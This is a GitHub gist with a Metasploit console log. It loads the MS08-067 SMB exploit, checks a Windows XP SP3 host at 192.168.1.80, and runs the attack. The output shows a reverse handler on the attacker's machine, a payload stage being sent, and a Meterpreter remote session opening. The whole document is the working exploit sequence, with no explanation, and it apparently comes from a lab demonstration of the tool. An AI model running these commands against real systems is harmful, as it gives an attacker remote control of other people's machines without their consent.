Created
February 11, 2015 04:45
-
-
Save wchen-r7/3ca22e58cc9d9a4212d5 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ ./msfconsole -q | |
msf > use exploit/windows/smb/ms08_067_netapi | |
msf exploit(ms08_067_netapi) > set rhost 192.168.1.80 | |
rhost => 192.168.1.80 | |
msf exploit(ms08_067_netapi) > check | |
[+] 192.168.1.80:445 - The target is vulnerable. | |
msf exploit(ms08_067_netapi) > run | |
[*] Started reverse handler on 192.168.1.64:4444 | |
[*] Automatically detecting the target... | |
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English | |
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX) | |
[*] Attempting to trigger the vulnerability... | |
[*] Sending stage (770048 bytes) to 192.168.1.80 | |
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.80:1790) at 2015-02-10 22:45:04 -0600 | |
meterpreter > |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment